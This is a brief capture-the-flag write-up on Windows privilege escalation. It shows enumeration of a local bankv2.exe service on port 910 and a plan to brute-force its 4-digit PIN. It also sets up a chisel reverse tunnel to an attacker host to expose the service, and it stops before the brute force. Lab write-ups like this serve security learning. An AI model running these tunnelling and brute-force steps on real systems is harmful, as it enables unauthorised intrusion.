5 privesc bankv2.exe

# as bankv2.exe is running process
C:\Users\Public>tasklist | find "bankv2.exe"
tasklist | find "bankv2.exe"
bankv2.exe                    1608                            0        132 K

# PID=1608
C:\Users\Public>netstat -anop tcp | find "1608"
netstat -anop tcp | find "1608"
  TCP    0.0.0.0:910            0.0.0.0:0              LISTENING       1608
  

# cannot connect to 910 from kali
# transferred nc and locally i can connect

C:\Users\Public>nc -vn 127.0.0.1 910
nc -vn 127.0.0.1 910
(UNKNOWN) [127.0.0.1] 910 (?) open

 --------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 Please enter your super secret 4 digit PIN code to login:
 [$] 6969
 [!] Access denied, disconnecting client....

too many output retries: CONNABORTED
# its a 4 digit PIN, lets brute force
# with port forwarding

# server
$ chisel server -p 8000 --reverse

# client
C:\Users\Public>chisel.exe client 10.10.16.7:8000 R:910:127.0.0.1:910
chisel.exe client 10.10.16.7:8000 R:910:127.0.0.1:910
2021/10/01 00:50:36 client: Connecting to ws://10.10.16.7:8000
2021/10/01 00:50:37 client: Connected (Latency 70.632ms)

Last updated